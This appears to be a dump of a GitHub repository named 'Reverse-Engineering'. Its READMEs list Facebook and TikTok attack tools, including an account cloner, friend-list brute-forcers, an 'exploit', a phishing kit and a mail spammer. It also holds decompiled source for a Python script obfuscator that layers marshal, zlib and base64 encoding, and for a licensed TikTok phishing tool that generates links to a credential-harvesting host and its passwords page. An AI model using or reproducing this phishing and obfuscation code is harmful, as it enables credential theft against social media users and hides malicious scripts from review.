├── nenc ├── README.md ├── nenc-enc.py └── nenc-enc_dec.py ├── FPD ├── README.md ├── FPD.py └── FPD_dec.py ├── fexploit ├── README.md ├── fexploit.py └── fexploit_dec.py ├── fcloner ├── README.md ├── fcloner.py └── fcloner_dec.py ├── tikphish ├── README.md ├── tikphish.py └── tikphish_dec.py ├── flb3 ├── README.md ├── flb3.py └── flb3_dec.py ├── pyndb ├── README.md ├── pyndb.py └── pyndb_dec.py ├── flb2 ├── flb2.py ├── README.md └── flb2_dec.py ├── mailspam ├── mailspam.py ├── README.md └── mailspam_dec.py └── README.md /nenc/README.md: -------------------------------------------------------------------------------- 1 | # nenc 2 | Python script encryter 3 | -------------------------------------------------------------------------------- /FPD/README.md: -------------------------------------------------------------------------------- 1 | # FPD 2 | Facebook Pictures Downloader 3 | -------------------------------------------------------------------------------- /fexploit/README.md: -------------------------------------------------------------------------------- 1 | # fexploit- 2 | Facebook Exploit 3 | -------------------------------------------------------------------------------- /fcloner/README.md: -------------------------------------------------------------------------------- 1 | # fcloner 2 | The Facebook Account Cloner 3 | -------------------------------------------------------------------------------- /tikphish/README.md: -------------------------------------------------------------------------------- 1 | # tikphish 2 | The Tiktok Phishing Attack 3 | -------------------------------------------------------------------------------- /flb3/README.md: -------------------------------------------------------------------------------- 1 | # flb3 2 | The Fastest Facebook Friendlist Multibruteforce 3 | -------------------------------------------------------------------------------- /FPD/FPD.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/FPD/FPD.py -------------------------------------------------------------------------------- /pyndb/README.md: -------------------------------------------------------------------------------- 1 | # pyndb 2 | Facebook Information Framework Python Nasir_DataBase 3 | -------------------------------------------------------------------------------- /flb2/flb2.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/flb2/flb2.py -------------------------------------------------------------------------------- /flb3/flb3.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/flb3/flb3.py -------------------------------------------------------------------------------- /pyndb/pyndb.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/pyndb/pyndb.py -------------------------------------------------------------------------------- /fcloner/fcloner.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/fcloner/fcloner.py -------------------------------------------------------------------------------- /flb2/README.md: -------------------------------------------------------------------------------- 1 | # flb2 4X Speed (MultiThreading) 2 | The Most Fastest Facebook Friend List Bruter 3 | -------------------------------------------------------------------------------- /nenc/nenc-enc.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/nenc/nenc-enc.py -------------------------------------------------------------------------------- /fexploit/fexploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/fexploit/fexploit.py -------------------------------------------------------------------------------- /mailspam/mailspam.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/mailspam/mailspam.py -------------------------------------------------------------------------------- /tikphish/tikphish.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tahmidrayat/Reverse-Engineering/HEAD/tikphish/tikphish.py -------------------------------------------------------------------------------- /mailspam/README.md: -------------------------------------------------------------------------------- 1 | # Mailspam V1.0 2 | Developer : Nasir Ali 3 | 4 |

5 | #Installation 6 | 7 | $git clone https://github.com/nasirxo/mailspam.git 8 | $cd mailspam 9 | $python2 mailspam.py 10 | 11 |

12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### PROJECT MOVED TO : 2 | 3 | ### [hax0rtahm1d](https://github.com/hax0rtahm1d/Reverse-Engineering) 4 | 5 | #### [https://github.com/hax0rtahm1d/Reverse-Engineering](https://github.com/hax0rtahm1d/Reverse-Engineering) 6 | 7 | -------------------------------------------------------------------------------- /nenc/nenc-enc_dec.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.3 2 | # Python bytecode 2.7 3 | # Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15) 4 | # [GCC 8.3.0] 5 | # Embedded file name: 6 | """ 7 | Copyright 2019 8 | All Right Reserved With Developer : Nasir Ali 9 | Do Not Re-Code That's would'nt make you programmer 10 | Dated : 10-july-2019 WED 3:25 PKST 11 | """ 12 | import marshal as mc, zlib, base64, time, sys, os 13 | print '\n_ _ ____ _ _ ____ _ _ ____ _ _ ___ ___ \n|\\ | |___ \\/ __ |___ |\\ | | \\_/ |__] | \n| \\| |___ _/\\_ |___ | \\| |___ | | | \n \nNeX Script Encoder\nBy #Nasir_Ali \nFB : fb.com/nasir.xo\nInsta : @nasir.xoz\nGithub : github.com/nasirxo\n' 14 | try: 15 | input_s = raw_input('Script To Encypt : ') 16 | r = mc.dumps(compile(open(input_s, 'rb').read(), '', 'exec')) 17 | except: 18 | print 'Invalid File' 19 | sys.exit() 20 | 21 | s = base64.b16encode(zlib.compress(r)) 22 | ecode = ("\n# -*- coding: UTF-8 -*-\n'''Nex-Encypted {}\nDeveloper : Nasir Ali\n'''\nimport sys\nimport zlib as zn\nfrom base64 import *\nimport marshal as mc\n\ndef main_code():\n exec(mc.loads(zn.decompress(b16decode('{}'))))\n\nmain_code()\n").format(time.ctime(), s) 23 | e2code = ('\nimport marshal , base64\nexec(marshal.loads(base64.b16decode("{}")))\n').format(base64.b16encode(mc.dumps(compile(ecode, '', 'exec')))) 24 | e3code = ('\nimport marshal , base64\nexec(marshal.loads(base64.b32decode("{}")))\n').format(base64.b32encode(mc.dumps(compile(e2code, '', 'exec')))) 25 | rmcode = base64.b16encode(mc.dumps(compile(e3code, '', 'exec'))) 26 | pycc = base64.b32encode(mc.dumps(compile('\nimport os\nos.system("rm -rf *.pyc")\n', '', 'exec'))) 27 | rccd = ("\n'''\nDeveloper : Nasir Ali\nEncoded with Nex-encode\n'''\nimport marshal , base64 , os\nexec(marshal.loads(base64.b32decode(b'{}')))\nexec(marshal.loads(base64.b16decode('{}')))\n").format(pycc, rmcode) 28 | print ('Old Size : {} Bytes').format(len(r)) 29 | with open('__main__.py', 'wb') as (es): 30 | es.write(rccd) 31 | os.system(('zip {} {}').format('nenc-' + input_s, '__main__.py')) 32 | print ('New Size : {} Bytes').format(len(open('nenc-' + input_s, 'rb').read())) 33 | os.system(('rm {}').format('__main__.py')) 34 | print ('Generated Encypted Script : {}').format('nenc-' + input_s) -------------------------------------------------------------------------------- /tikphish/tikphish_dec.py: -------------------------------------------------------------------------------- 1 | 2 | # -*- coding: UTF-8 -*- 3 | 4 | #Colours Defined Variables 5 | 6 | W = '\033[1;37m' 7 | N = '\033[0m' 8 | R="\033[1;37m\033[31m" 9 | B = '\033[1;37m\033[34m' 10 | G = '\033[1;32m' 11 | Y = '\033[1;33;40m' 12 | 13 | #Decorators 14 | SBR = W+"("+R+"π"+W+")" 15 | SBG = W+"("+G+"π"+W+")" 16 | SRO = W+"("+R+">"+W+")" 17 | SGO = W+"("+G+">"+W+")" 18 | 19 | SEO = W+"("+R+"!"+W+")" 20 | 21 | newlin = "\n" 22 | #SBG = '\x1b[1;37m(\x1b[1;32m\xe2\x97\x8f\x1b[1;37m)' 23 | #SBR = '\x1b[1;37m(\x1b[1;37m\x1b[31m\xe2\x97\x8f\x1b[1;37m)' 24 | 25 | 26 | 27 | import os 28 | from base64 import * 29 | from random import choice as c 30 | import time 31 | 32 | 33 | banner = """ 34 | {} 35 | ┈┈┈╲┈┈┈┈╱ 36 | ┈┈┈╱ ▔▔╲ 37 | ┈┈┃┈▇┈┈▇┈┃ {} DarkSec Present's{} 38 | ╭╮┣━━━━━━┫╭╮ 39 | ┃┃┃┈┈┈┈┈┈┃┃┃ {}Tik-Tok Phisher V1.1{} 40 | ╰╯┃┈┈┈┈┈┈┃╰╯ {} By : Nasir Ali{} 41 | ┈┈╰┓┏━━┓┏╯ 42 | ┈┈┈╰╯┈┈╰╯ 43 | 44 | {}Youtube :{} youtube.com/TheDarkSec 45 | {}Github : {}github.com/nasirxo 46 | {}Facebook :{} facebook.com/nasir.xo 47 | 48 | """.format(Y,R,Y,G,Y,G,Y,G,W,G,W,G,W) 49 | 50 | os.system("clear") 51 | print(banner) 52 | i=0 53 | key = "darksec47" 54 | while i==0: 55 | try: 56 | #r = get("https://mbasic.facebook.com/nasir.xo") 57 | #data = BeautifulSoup(r.content,features="html.parser") 58 | #xD = data.find('span', attrs={'dir': 'ltr'}) 59 | #key = xD.get_text().split()[0] 60 | ikey = input(SBR+" Enter License Key : ") 61 | if ikey == key: 62 | print(SGO+" Authorization Sucessfull ! ") 63 | time.sleep(3) 64 | while i==0: 65 | os.system('clear') 66 | time.sleep(2) 67 | print(banner) 68 | print(""" 69 | {} [Select-Option] 70 | 71 | {} (1) : Generate Phishing Link 72 | {} (2) : Exit 73 | 74 | 75 | """.format(Y,SBG,SBG)) 76 | op = input(SRO+" Option : ") 77 | n = list('abcdefghijklmnopqrstuvwxyz1234567890') 78 | if str(op) == '1': 79 | ID = ''.join([c(n) for x in range(5)]) 80 | KE = b16encode(ID.encode("utf-8")) 81 | print(""" 82 | {} [ Link-Generated ] 83 | 84 | {} =================================================== 85 | {} Phishing Link : 86 | http://tik-tok.rf.gd/login.php?ID={} 87 | {} Passwords Link : 88 | http://tik-tok.rf.gd/pass.php?KEY={} 89 | 90 | {} =================================================== 91 | 92 | """.format(G,Y,SGO,ID,SGO,KE.decode("utf-8"),Y)) 93 | f = input() 94 | elif str(op) == '2': 95 | print(SBR+" BYE BYE !") 96 | i+=1 97 | quit() 98 | 99 | else: 100 | print(SEO+" Invalid Input ! ") 101 | print(SEO+" Invalid Key ! ") 102 | except: 103 | pass -------------------------------------------------------------------------------- /fexploit/fexploit_dec.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.3 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15) 4 | # [GCC 8.3.0] 5 | # Embedded file name: